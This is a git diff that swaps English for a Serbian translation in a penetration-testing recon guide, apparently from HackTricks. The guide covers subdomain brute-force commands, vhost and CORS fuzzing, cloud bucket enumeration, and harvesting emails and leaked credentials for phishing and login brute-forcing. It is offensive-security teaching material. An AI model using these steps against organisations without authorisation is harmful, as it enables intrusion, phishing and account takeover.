-- [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is a wrapper around `massdns`, written in go, that allows you to enumerate valid subdomains using active bruteforce, as well as resolve subdomains with wildcard handling and easy input-output support.
-
+- [**shuffledns**](https://github.com/projectdiscovery/shuffledns) je omotač oko `massdns`, napisan u go, koji vam omogućava da enumerišete validne poddomene koristeći aktivni bruteforce, kao i da rešavate poddomene sa obradom wildcard-a i jednostavnom podrškom za ulaz-izlaz.
 ```
 shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt
 ```
-
-- [**puredns**](https://github.com/d3mondev/puredns): It also uses `massdns`.
-
+- [**puredns**](https://github.com/d3mondev/puredns): Takođe koristi `massdns`.
 ```
 puredns bruteforce all.txt domain.com
 ```
-
-- [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) uses asyncio to brute force domain names asynchronously.
-
+- [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) koristi asyncio za asinkrono brute force napad na imena domena.
 ```
 aiodnsbrute -r resolvers -w wordlist.txt -vv -t 1024 domain.com
 ```
+### Druga runda DNS brute-force
 
-### Second DNS Brute-Force Round
-
-After having found subdomains using open sources and brute-forcing, you could generate alterations of the subdomains found to try to find even more. Several tools are useful for this purpose:
-
-- [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Given the domains and subdomains generate permutations.
+Nakon što ste pronašli poddomene koristeći otvorene izvore i brute-forcing, možete generisati varijacije pronađenih poddomena kako biste pokušali da pronađete još više. Nekoliko alata je korisno za ovu svrhu:
 
+- [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Dajući domene i poddomene generiše permutacije.
 ```bash
 cat subdomains.txt | dnsgen -
 ```
-
-- [**goaltdns**](https://github.com/subfinder/goaltdns): Given the domains and subdomains generate permutations.
-  - You can get goaltdns permutations **wordlist** in [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt).
-
+- [**goaltdns**](https://github.com/subfinder/goaltdns): Dati domene i poddomene generišite permutacije.
+- Možete dobiti goaltdns permutacije **wordlist** **ovde** [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt).
 ```bash
 goaltdns -l subdomains.txt -w /tmp/words-permutations.txt -o /tmp/final-words-s3.txt
 ```
-
-- [**gotator**](https://github.com/Josue87/gotator)**:** Given the domains and subdomains generate permutations. If not permutations file is indicated gotator will use its own one.
-
+- [**gotator**](https://github.com/Josue87/gotator)**:** Dati domene i poddomene generiše permutacije. Ako nije naznačen fajl sa permutacijama, gotator će koristiti svoj.
 ```
 gotator -sub subdomains.txt -silent [-perm /tmp/words-permutations.txt]
 ```
-
-- [**altdns**](https://github.com/infosec-au/altdns): Apart from generating subdomains permutations, it can also try to resolve them (but it's better to use the previous commented tools).
-  - You can get altdns permutations **wordlist** in [**here**](https://github.com/infosec-au/altdns/blob/master/words.txt).
-
+- [**altdns**](https://github.com/infosec-au/altdns): Osim generisanja permutacija poddomena, može pokušati i da ih reši (ali je bolje koristiti prethodno pomenute alate).
+- Možete dobiti altdns permutacije **wordlist** u [**ovde**](https://github.com/infosec-au/altdns/blob/master/words.txt).
 ```
 altdns -i subdomains.txt -w /tmp/words-permutations.txt -o /tmp/asd3
 ```
-
-- [**dmut**](https://github.com/bp0lr/dmut): Another tool to perform permutations, mutations and alteration of subdomains. This tool will brute force the result (it doesn't support dns wild card).
-  - You can get dmut permutations wordlist in [**here**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt).
-
+- [**dmut**](https://github.com/bp0lr/dmut): Još jedan alat za izvođenje permutacija, mutacija i izmena poddomena. Ovaj alat će izvršiti brute force na rezultat (ne podržava dns wild card).
+- Možete dobiti dmut permutacije rečnik [**ovde**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt).
 ```bash
 cat subdomains.txt | dmut -d /tmp/words-permutations.txt -w 100 \
-    --dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt
+--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt
 ```
+- [**alterx**](https://github.com/projectdiscovery/alterx)**:** Na osnovu domena **generiše nova potencijalna imena poddomena** na osnovu naznačenih obrazaca kako bi pokušao da otkrije više poddomena.
 
-- [**alterx**](https://github.com/projectdiscovery/alterx)**:** Based on a domain it **generates new potential subdomains names** based on indicated patterns to try to discover more subdomains.
-
-#### Smart permutations generation
-
-- [**regulator**](https://github.com/cramppet/regulator): For more info read this [**post**](https://cramppet.github.io/regulator/index.html) but it will basically get the **main parts** from the **discovered subdomains** and will mix them to find more subdomains.
+#### Pametna generacija permutacija
 
+- [**regulator**](https://github.com/cramppet/regulator): Za više informacija pročitajte ovaj [**post**](https://cramppet.github.io/regulator/index.html), ali će u suštini uzeti **glavne delove** iz **otkrivenih poddomena** i mešati ih kako bi pronašao više poddomena.
 ```bash
 python3 main.py adobe.com adobe adobe.rules
 make_brute_list.sh adobe.rules adobe.brute
 puredns resolve adobe.brute --write adobe.valid
 ```
-
-- [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is a subdomain brute-force fuzzer coupled with an immensly simple but effective DNS reponse-guided algorithm. It utilizes a provided set of input data, like a tailored wordlist or historical DNS/TLS records, to accurately synthesize more corresponding domain names and expand them even further in a loop based on information gathered during DNS scan.
-
+- [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ je fuzzer za brute-force subdomena uparen sa izuzetno jednostavnim, ali efikasnim algoritmom vođenim DNS odgovorima. Koristi pruženi skup ulaznih podataka, kao što su prilagođena lista reči ili istorijski DNS/TLS zapisi, da precizno sintetiše više odgovarajućih imena domena i dodatno ih proširuje u petlji na osnovu informacija prikupljenih tokom DNS skeniranja.
 ```
 echo www | subzuf facebook.com
 ```
+### **Workflow za Otkriće Poddomena**
 
-### **Subdomain Discovery Workflow**
-
-Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
+Pogledajte ovaj blog post koji sam napisao o tome kako da **automatizujem otkrivanje poddomena** sa domena koristeći **Trickest workflows** tako da ne moram ručno da pokrećem gomilu alata na svom računaru:
 
 {% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %}
 
 {% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %}
 
-### **VHosts / Virtual Hosts**
+### **VHosts / Virtuelni Hostovi**
 
-If you found an IP address containing **one or several web pages** belonging to subdomains, you could try to **find other subdomains with webs in that IP** by looking in **OSINT sources** for domains in an IP or by **brute-forcing VHost domain names in that IP**.
+Ako ste pronašli IP adresu koja sadrži **jednu ili više web stranica** koje pripadaju poddomenima, možete pokušati da **pronađete druge poddomene sa web stranicama na toj IP adresi** tražeći u **OSINT izvorima** za domene na IP-u ili **brute-forcing VHost imena domena na toj IP adresi**.
 
 #### OSINT
 
-You can find some **VHosts in IPs using** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **or other APIs**.
+Možete pronaći neke **VHost-ove na IP-ovima koristeći** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **ili druge API-je**.
 
 **Brute Force**
 
-If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
-
+Ako sumnjate da neki poddomen može biti skriven na web serveru, možete pokušati da ga brute-forcujete:
 ```bash
 ffuf -c -w /path/to/wordlist -u http://victim.com -H "Host: FUZZ.victim.com"
 
@@ -519,207 +434,196 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com
 #https://github.com/codingo/VHostScan
 VHostScan -t example.com
 ```
-
 > [!NOTE]
-> With this technique you may even be able to access internal/hidden endpoints.
+> Ovom tehnikom možda ćete moći da pristupite internim/skrivenim krajnjim tačkama.
 
 ### **CORS Brute Force**
 
-Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behaviour to **discover** new **subdomains**.
-
+Ponekad ćete naići na stranice koje vraćaju samo zaglavlje _**Access-Control-Allow-Origin**_ kada je validna domena/subdomena postavljena u _**Origin**_ zaglavlju. U ovim scenarijima, možete zloupotrebiti ovo ponašanje da **otkrijete** nove **subdomene**.
 ```bash
 ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
 ```
+### **Brute Force za Buckete**
 
-### **Buckets Brute Force**
+Dok tražite **subdomene**, obratite pažnju da li se **upučuju** na bilo koju vrstu **bucketa**, i u tom slučaju [**proverite dozvole**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
+Takođe, kako ćete u ovom trenutku znati sve domene unutar opsega, pokušajte da [**brute force-ujete moguće nazive bucketa i proverite dozvole**](../../network-services-pentesting/pentesting-web/buckets/).
 
-While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
-Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
+### **Monitorisanje**
 
-### **Monitorization**
+Možete **monitorisati** da li su **nove subdomene** domena kreirane praćenjem **Certificate Transparency** logova [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)to radi.
 
-You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
+### **Traženje ranjivosti**
 
-### **Looking for vulnerabilities**
+Proverite moguće [**preuzimanje subdomena**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
+Ako se **subdomena** upućuje na neki **S3 bucket**, [**proverite dozvole**](../../network-services-pentesting/pentesting-web/buckets/).
 
-Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
-If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
+Ako pronađete bilo koju **subdomenu sa IP-om koji se razlikuje** od onih koje ste već pronašli u otkrivanju resursa, trebali biste izvršiti **osnovno skeniranje ranjivosti** (koristeći Nessus ili OpenVAS) i neko [**skeniranje portova**](../pentesting-network/#discovering-hosts-from-the-outside) sa **nmap/masscan/shodan**. U zavisnosti od toga koji servisi rade, možete pronaći u **ovoj knjizi neke trikove za "napad" na njih**.\
+&#xNAN;_Note da ponekad subdomena je hostovana unutar IP-a koji nije pod kontrolom klijenta, tako da nije u opsegu, budite oprezni._
 
-If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
-&#xNAN;_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
+## IP-ovi
 
-## IPs
+U početnim koracima možda ste **pronašli neke IP opsege, domene i subdomene**.\
+Sada je vreme da **prikupite sve IP-ove iz tih opsega** i za **domene/subdomene (DNS upiti).**
 
-In the initial steps you might have **found some IP ranges, domains and subdomains**.\
-It’s time to **recollect all the IPs from those ranges** and for the **domains/subdomains (DNS queries).**
-
-Using services from the following **free apis** you can also find **previous IPs used by domains and subdomains**. These IPs might still be owned by the client (and might allow you to find [**CloudFlare bypasses**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md))
+Koristeći usluge iz sledećih **besplatnih API-ja** možete takođe pronaći **prethodne IP-ove korišćene od strane domena i subdomena**. Ovi IP-ovi možda još uvek pripadaju klijentu (i mogu vam omogućiti da pronađete [**CloudFlare zaobilaženja**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md))
 
 - [**https://securitytrails.com/**](https://securitytrails.com/)
 
-You can also check for domains pointing a specific IP address using the tool [**hakip2host**](https://github.com/hakluke/hakip2host)
+Takođe možete proveriti za domene koje upućuju na određenu IP adresu koristeći alat [**hakip2host**](https://github.com/hakluke/hakip2host)
 
-### **Looking for vulnerabilities**
+### **Traženje ranjivosti**
 
-**Port scan all the IPs that doesn’t belong to CDNs** (as you highly probably won’t find anything interested in there). In the running services discovered you might be **able to find vulnerabilities**.
+**Skenirajte sve IP-ove koji ne pripadaju CDN-ima** (jer verovatno nećete pronaći ništa zanimljivo tamo). U otkrivenim servisima možda ćete **moći da pronađete ranjivosti**.
 
-**Find a** [**guide**](../pentesting-network/) **about how to scan hosts.**
+**Pronađite** [**vodič**](../pentesting-network/) **o tome kako skenirati hostove.**
 
-## Web servers hunting
+## Lov na web servere
 
-> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
+> Pronašli smo sve kompanije i njihove resurse i znamo IP opsege, domene i subdomene unutar opsega. Sada je vreme da tražimo web servere.
 
-In the previous steps you have probably already performed some **recon of the IPs and domains discovered**, so you may have **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope.
+U prethodnim koracima verovatno ste već izvršili neku **recon za IP-ove i domene koje ste otkrili**, tako da ste možda **već pronašli sve moguće web servere**. Međutim, ako niste, sada ćemo videti neke **brze trikove za pretragu web servera** unutar opsega.
 
-Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope).
-
-A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\
-Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) and [**httpx**](https://github.com/projectdiscovery/httpx). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). Additionally, you can indicate to try other ports:
+Molimo vas da napomenete da će ovo biti **orijentisano na otkrivanje web aplikacija**, tako da biste trebali **izvršiti skeniranje ranjivosti** i **skeniranje portova** takođe (**ako je dozvoljeno** od strane opsega).
 
+**Brza metoda** za otkrivanje **otvorenih portova** povezanih sa **web** serverima koristeći [**masscan** može se pronaći ovde](../pentesting-network/#http-port-discovery).\
+Još jedan prijateljski alat za pretragu web servera je [**httprobe**](https://github.com/tomnomnom/httprobe)**,** [**fprobe**](https://github.com/theblackturtle/fprobe) i [**httpx**](https://github.com/projectdiscovery/httpx). Samo prosledite listu domena i pokušaće da se poveže na port 80 (http) i 443 (https). Pored toga, možete naznačiti da pokušate druge portove:
 ```bash
 cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443
 cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
 ```
-
 ### **Screenshots**
 
-Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**.
+Sada kada ste otkrili **sve web servere** prisutne u opsegu (među **IP-ovima** kompanije i svim **domenima** i **poddomenama**) verovatno **ne znate odakle da počnete**. Dakle, hajde da to pojednostavimo i počnemo tako što ćemo praviti snimke ekrana svih njih. Samo gledajući **glavnu stranicu** možete pronaći **čudne** krajnje tačke koje su više **podložne** da budu **ranjive**.
 
-To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/), [**Gowitness**](https://github.com/sensepost/gowitness) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
+Da biste sproveli predloženu ideju, možete koristiti [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), [**Shutter**](https://shutter-project.org/downloads/third-party-packages/), [**Gowitness**](https://github.com/sensepost/gowitness) ili [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
 
-Moreover, you could then use [**eyeballer**](https://github.com/BishopFox/eyeballer) to run over all the **screenshots** to tell you **what's likely to contain vulnerabilities**, and what isn't.
+Pored toga, možete koristiti [**eyeballer**](https://github.com/BishopFox/eyeballer) da pregledate sve **screenshotove** i kažete vam **šta verovatno sadrži ranjivosti**, a šta ne.
 
-## Public Cloud Assets
+## Javni Cloud Resursi
 
-In order to find potential cloud assets belonging to a company you should **start with a list of keywords that identify that company**. For example, a crypto for a crypto company you might use words such as: `"crypto", "wallet", "dao", "", <"subdomain_names">`.
+Da biste pronašli potencijalne cloud resurse koji pripadaju kompaniji, trebali biste **početi sa listom ključnih reči koje identifikuju tu kompaniju**. Na primer, za kripto kompaniju možete koristiti reči kao što su: `"crypto", "wallet", "dao", "", <"subdomain_names">`.
 
-You will also need wordlists of **common words used in buckets**:
+Takođe će vam biti potrebne liste reči **uobičajenih reči korišćenih u kanticama**:
 
 - [https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt](https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt)
 - [https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt](https://raw.githubusercontent.com/infosec-au/altdns/master/words.txt)
 - [https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt](https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt)
 
-Then, with those words you should generate **permutations** (check the [**Second Round DNS Brute-Force**](./#second-dns-bruteforce-round) for more info).
+Zatim, sa tim rečima trebali biste generisati **permutacije** (proverite [**Drugu rundu DNS Brute-Force**](./#second-dns-bruteforce-round) za više informacija).
 
-With the resulting wordlists you could use tools such as [**cloud_enum**](https://github.com/initstring/cloud_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **or** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.**
+Sa dobijenim listama reči možete koristiti alate kao što su [**cloud_enum**](https://github.com/initstring/cloud_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper)**,** [**cloudlist**](https://github.com/projectdiscovery/cloudlist) **ili** [**S3Scanner**](https://github.com/sa7mon/S3Scanner)**.**
 
-Remember that when looking for Cloud Assets you should l**ook for more than just buckets in AWS**.
+Zapamtite da kada tražite Cloud Resurse, trebali biste **gledati više od samo kanti u AWS-u**.
 
-### **Looking for vulnerabilities**
+### **Traženje ranjivosti**
 
-If you find things such as **open buckets or cloud functions exposed** you should **access them** and try to see what they offer you and if you can abuse them.
+Ako pronađete stvari kao što su **otvorene kante ili izložene cloud funkcije**, trebali biste **pristupiti njima** i pokušati da vidite šta vam nude i da li ih možete zloupotrebiti.
 
-## Emails
+## Emailovi
 
-With the **domains** and **subdomains** inside the scope you basically have all what you **need to start searching for emails**. These are the **APIs** and **tools** that have worked the best for me to find emails of a company:
+Sa **domenima** i **poddomenama** unutar opsega, u suštini imate sve što vam **treba da počnete da tražite emailove**. Ovo su **API-ji** i **alati** koji su mi najbolje radili za pronalaženje emailova kompanije:
 
-- [**theHarvester**](https://github.com/laramies/theHarvester) - with APIs
-- API of [**https://hunter.io/**](https://hunter.io/) (free version)
-- API of [**https://app.snov.io/**](https://app.snov.io/) (free version)
-- API of [**https://minelead.io/**](https://minelead.io/) (free version)
+- [**theHarvester**](https://github.com/laramies/theHarvester) - sa API-ima
+- API [**https://hunter.io/**](https://hunter.io/) (besplatna verzija)
+- API [**https://app.snov.io/**](https://app.snov.io/) (besplatna verzija)
+- API [**https://minelead.io/**](https://minelead.io/) (besplatna verzija)
 
-### **Looking for vulnerabilities**
+### **Traženje ranjivosti**
 
-Emails will come handy later to **brute-force web logins and auth services** (such as SSH). Also, they are needed for **phishings**. Moreover, these APIs will give you even more **info about the person** behind the email, which is useful for the phishing campaign.
+Emailovi će biti korisni kasnije za **brute-force web prijave i auth servise** (kao što je SSH). Takođe, potrebni su za **phishing**. Pored toga, ovi API-ji će vam dati još više **informacija o osobi** iza emaila, što je korisno za phishing kampanju.
 
-## Credential Leaks
+## Curjenje Akreditiva
 
-With the **domains,** **subdomains**, and **emails** you can start looking for credentials leaked in the past belonging to those emails:
+Sa **domenima,** **poddomenama** i **emailovima** možete početi da tražite akreditive koji su procurili u prošlosti i koji pripadaju tim emailovima:
 
 - [https://leak-lookup.com](https://leak-lookup.com/account/login)
 - [https://www.dehashed.com/](https://www.dehashed.com/)
 
-### **Looking for vulnerabilities**
+### **Traženje ranjivosti**
 
-If you find **valid leaked** credentials, this is a very easy win.
+Ako pronađete **validne procurene** akreditive, ovo je vrlo lakša pobeda.
 
-## Secrets Leaks
+## Curenje Tajni
 
-Credential leaks are related to hacks of companies where **sensitive information was leaked and sold**. However, companies might be affected for **other leaks** whose info isn't in those databases:
+Curenje akreditiva je povezano sa hakovanjem kompanija gde je **osetljive informacije procurile i prodane**. Međutim, kompanije mogu biti pogođene i **drugim curenjima** čije informacije nisu u tim bazama podataka:
 
-### Github Leaks
+### Github Curjenja
 
-Credentials and APIs might be leaked in the **public repositories** of the **company** or of the **users** working by that github company.\
-You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to **download** all the **public repos** of an **organization** and of its **developers** and run [**gitleaks**](https://github.com/zricethezav/gitleaks) over them automatically.
+Akreditivi i API-ji mogu biti procureni u **javnim repozitorijumima** **kompanije** ili **korisnika** koji rade za tu github kompaniju.\
+Možete koristiti **alat** [**Leakos**](https://github.com/carlospolop/Leakos) da **preuzmete** sve **javne repoe** jedne **organizacije** i njenih **razvijača** i automatski pokrenete [**gitleaks**](https://github.com/zricethezav/gitleaks) nad njima.
 
-**Leakos** can also be used to run **gitleaks** agains all the **text** provided **URLs passed** to it as sometimes **web pages also contains secrets**.
+**Leakos** se takođe može koristiti za pokretanje **gitleaks** protiv svih **tekstova** koji su **URL-ovi prosleđeni** njemu, jer ponekad **web stranice takođe sadrže tajne**.
 
 #### Github Dorks
 
-Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking:
+Proverite takođe ovu **stranicu** za potencijalne **github dorks** koje takođe možete pretraživati u organizaciji koju napadate:
 
 {{#ref}}
 github-leaked-secrets.md
 {{#endref}}
 
-### Pastes Leaks
+### Curenja Paste
 
-Sometimes attackers or just workers will **publish company content in a paste site**. This might or might not contain **sensitive information**, but it's very interesting to search for it.\
-You can use the tool [**Pastos**](https://github.com/carlospolop/Pastos) to search in more that 80 paste sites at the same time.
+Ponekad napadači ili samo radnici će **objaviti sadržaj kompanije na paste sajtu**. Ovo može ili ne mora sadržati **osetljive informacije**, ali je veoma zanimljivo tražiti to.\
+Možete koristiti alat [**Pastos**](https://github.com/carlospolop/Pastos) da pretražujete na više od 80 paste sajtova u isto vreme.
 
 ### Google Dorks
 
-Old but gold google dorks are always useful to find **exposed information that shouldn't be there**. The only problem is that the [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) contains several **thousands** of possible queries that you cannot run manually. So, you can get your favourite 10 ones or you could use a **tool such as** [**Gorks**](https://github.com/carlospolop/Gorks) **to run them all**.
+Stari, ali zlatni google dorks su uvek korisni za pronalaženje **izloženih informacija koje ne bi trebale biti tu**. Jedini problem je što [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) sadrži nekoliko **hiljada** mogućih upita koje ne možete ručno pokrenuti. Dakle, možete uzeti svojih omiljenih 10 ili možete koristiti **alat kao što je** [**Gorks**](https://github.com/carlospolop/Gorks) **da ih sve pokrenete**.
 
-_Note that the tools that expect to run all the database using the regular Google browser will never end as google will block you very very soon._
+_Napomena da alati koji očekuju da pokrenu celu bazu koristeći regularni Google pretraživač nikada neće završiti jer će vas google vrlo brzo blokirati._
 
-### **Looking for vulnerabilities**
+### **Traženje ranjivosti**
 
-If you find **valid leaked** credentials or API tokens, this is a very easy win.
+Ako pronađete **validne procurene** akreditive ili API tokene, ovo je vrlo laka pobeda.
 
-## Public Code Vulnerabilities
+## Javne Ranjivosti Koda
 
-If you found that the company has **open-source code** you can **analyse** it and search for **vulnerabilities** on it.
+Ako ste otkrili da kompanija ima **open-source kod**, možete ga **analizirati** i tražiti **ranjivosti** u njemu.
 
-**Depending on the language** there are different **tools** you can use:
+**U zavisnosti od jezika**, postoje različiti **alati** koje možete koristiti:
 
 {{#ref}}
 ../../network-services-pentesting/pentesting-web/code-review-tools.md
 {{#endref}}
 
-There are also free services that allow you to **scan public repositories**, such as:
+Takođe postoje besplatne usluge koje vam omogućavaju da **skenirate javne repozitorijume**, kao što su:
 
 - [**Snyk**](https://app.snyk.io/)
 
-## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/)
+## [**Pentesting Web Metodologija**](../../network-services-pentesting/pentesting-web/)
 
-The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/).
+**Većina ranjivosti** koje pronalaze lovci na greške se nalazi unutar **web aplikacija**, tako da bih u ovom trenutku želeo da govorim o **metodologiji testiranja web aplikacija**, a možete [**pronaći ove informacije ovde**](../../network-services-pentesting/pentesting-web/).
 
-I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.**
+Takođe želim da posebno pomenem sekciju [**Web Automatski Skenere open source alati**](../../network-services-pentesting/pentesting-web/#automatic-scanners), jer, ako ne biste trebali očekivati da pronađu veoma osetljive ranjivosti, oni su korisni za implementaciju u **tokove rada kako bi imali neke inicijalne web informacije.**
 
-## Recapitulation
+## Rekapitulacija
 
-> Congratulations! At this point you have already perform **all the basic enumeration**. Yes, it's basic because a lot more enumeration can be done (will see more tricks later).
+> Čestitamo! U ovom trenutku ste već izvršili **sve osnovne enumeracije**. Da, to je osnovno jer se može uraditi mnogo više enumeracija (videćemo više trikova kasnije).
 
-So you have already:
+Dakle, već ste:
 
-1. Found all the **companies** inside the scope
-2. Found all the **assets** belonging to the companies (and perform some vuln scan if in scope)
-3. Found all the **domains** belonging to the companies
-4. Found all the **subdomains** of the domains (any subdomain takeover?)
-5. Found all the **IPs** (from and **not from CDNs**) inside the scope.
-6. Found all the **web servers** and took a **screenshot** of them (anything weird worth a deeper look?)
-7. Found all the **potential public cloud assets** belonging to the company.
-8. **Emails**, **credentials leaks**, and **secret leaks** that could give you a **big win very easily**.
-9. **Pentesting all the webs you found**
+1. Pronašli sve **kompanije** unutar opsega
+2. Pronašli sve **resurse** koji pripadaju kompanijama (i izvršili neku skeniranje ranjivosti ako je u opsegu)
+3. Pronašli sve **domen** koji pripadaju kompanijama
+4. Pronašli sve **poddomen** domena (ima li preuzimanja poddomena?)
+5. Pronašli sve **IP-ove** (iz i **ne iz CDN-a**) unutar opsega.
+6. Pronašli sve **web servere** i napravili **screenshot** njih (ima li nešto čudno što vredi dubljeg pregleda?)
+7. Pronašli sve **potencijalne javne cloud resurse** koji pripadaju kompaniji.
+8. **Emailovi**, **curenje akreditiva**, i **curenje tajni** koji bi vam mogli dati **veliku pobedu vrlo lako**.
+9. **Pentesting svih web stranica koje ste pronašli**
 
-## **Full Recon Automatic Tools**
+## **Potpuni Automatski Alati za Recon**
 
-There are several tools out there that will perform part of the proposed actions against a given scope.
+Postoji nekoliko alata koji će izvršiti deo predloženih akcija protiv datog opsega.
 
 - [**https://github.com/yogeshojha/rengine**](https://github.com/yogeshojha/rengine)
 - [**https://github.com/j3ssie/Osmedeus**](https://github.com/j3ssie/Osmedeus)
 - [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw)
-- [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated
+- [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - Malo star i nije ažuriran
 
-## **References**
+## **Reference**
 
-- All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
-
-

-
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
+- Svi besplatni kursevi [**@Jhaddix**](https://twitter.com/Jhaddix) kao što je [**Metodologija lovca na greške v4.0 - Recon izdanje**](https://www.youtube.com/watch?v=p4JgIu1mceI)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md
index 53e1f35e6..6512c4eac 100644
--- a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md
+++ b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md
@@ -2,18 +2,15 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-\
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
-Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
+Sada kada smo sastavili listu resursa našeg opsega, vreme je da potražimo neke OSINT niske plodove.
 
-### Platforms that already searched for leaks
+### Platforme koje su već tražile leakove
 
 - [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/)
 
-### Api keys leaks in github
+### Api ključevi leakovi u github-u
 
 - [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog)
 - [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks)
